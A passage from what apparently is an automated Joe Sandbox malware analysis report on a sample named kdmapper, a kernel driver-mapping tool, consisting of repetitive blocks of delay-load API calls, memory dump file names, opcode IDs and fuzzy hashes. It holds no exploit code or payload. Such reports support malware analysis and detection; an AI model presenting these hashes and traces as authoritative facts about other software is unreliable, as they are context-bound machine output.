                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 4d406c08d096ef3bd5a89c616266af4b112e0730d12d0b3094aa333823f48ff6
                                                                                                                                                                                                              • Instruction ID: 1deeb36913850a0f68b1299231ddc66f1e3d5cbe7f0ac26fe658cd0dcd235226
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d406c08d096ef3bd5a89c616266af4b112e0730d12d0b3094aa333823f48ff6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EA011F22A838ABC300822002C0AC3B030CC0C0F22332E02EFA22E00A0AC80088008B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: b973e9a46ae5026906914842963fa6a703b328296f6edb42ebd1bbd7c78f9ab6
                                                                                                                                                                                                              • Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b973e9a46ae5026906914842963fa6a703b328296f6edb42ebd1bbd7c78f9ab6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: cdfeebd2febac80807c3fc6ae500fd1c8fc26b5ef330faf77d407d2eea07cee2
                                                                                                                                                                                                              • Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdfeebd2febac80807c3fc6ae500fd1c8fc26b5ef330faf77d407d2eea07cee2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 9848e8909934185d8e53cd711554dbf5f09efc45dedbd75daf23c3e81b08d605
                                                                                                                                                                                                              • Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9848e8909934185d8e53cd711554dbf5f09efc45dedbd75daf23c3e81b08d605
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: ebfade84fab45969fb6b502b0c6a61b91fc23bdb4b2281d23818771c1dea5fc8
                                                                                                                                                                                                              • Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebfade84fab45969fb6b502b0c6a61b91fc23bdb4b2281d23818771c1dea5fc8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 64dabde91c501fa2b19008715f1187699cecf0f7b65964dc0c9db691315ad266
                                                                                                                                                                                                              • Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64dabde91c501fa2b19008715f1187699cecf0f7b65964dc0c9db691315ad266
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE580
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: d5fa1d2af162a2f3ef8074586e819397fd88c8114362f026cdc8ec9575a668e3
                                                                                                                                                                                                              • Instruction ID: 4618276889a8b254664eb0d7016f01660c419a5518939d4b285e3c59b03d0016
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5fa1d2af162a2f3ef8074586e819397fd88c8114362f026cdc8ec9575a668e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97A011E22AC32ABC300822A02C02C3B030CC0C0FA0332E82EFA02C80A0A880088008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE580
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 370aa704d462c0a3b3b1ad3c327b27ff5054ffd8a9d5e993f58b3c0f4b0904bb
                                                                                                                                                                                                              • Instruction ID: 4618276889a8b254664eb0d7016f01660c419a5518939d4b285e3c59b03d0016
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 370aa704d462c0a3b3b1ad3c327b27ff5054ffd8a9d5e993f58b3c0f4b0904bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97A011E22AC32ABC300822A02C02C3B030CC0C0FA0332E82EFA02C80A0A880088008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: d57c384aa9a42babf7555c226c5323cf8a5b5180a6c906f67a4b56f1d4f2af4b
                                                                                                                                                                                                              • Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d57c384aa9a42babf7555c226c5323cf8a5b5180a6c906f67a4b56f1d4f2af4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 61753c75842a304637605fff0fc6f3960f3d247e9be0698d3a7b212cd04b2076
                                                                                                                                                                                                              • Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61753c75842a304637605fff0fc6f3960f3d247e9be0698d3a7b212cd04b2076
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: b9ce913c73b9ff1d35f8ba2667b344588881b3637d78e6ae81fbb45dd7c6d83c
                                                                                                                                                                                                              • Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9ce913c73b9ff1d35f8ba2667b344588881b3637d78e6ae81fbb45dd7c6d83c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE580
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: bb35ea60929e9865d101d66775104dc2220ea647806794b3e1ac04f991a71f8f
                                                                                                                                                                                                              • Instruction ID: a54ecd74c9f1de6eb934819face697babe2d0aaa9e7573e09ccfc7cc766fde13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb35ea60929e9865d101d66775104dc2220ea647806794b3e1ac04f991a71f8f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5A011E22E83283C300822A02C02C3B0B0CC0C0F22332E22EFA02E80A0A880088008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: c247ab1407bc818ae08891abf7c41c5ee7d3ec4e6cb09ac790273a5841980247
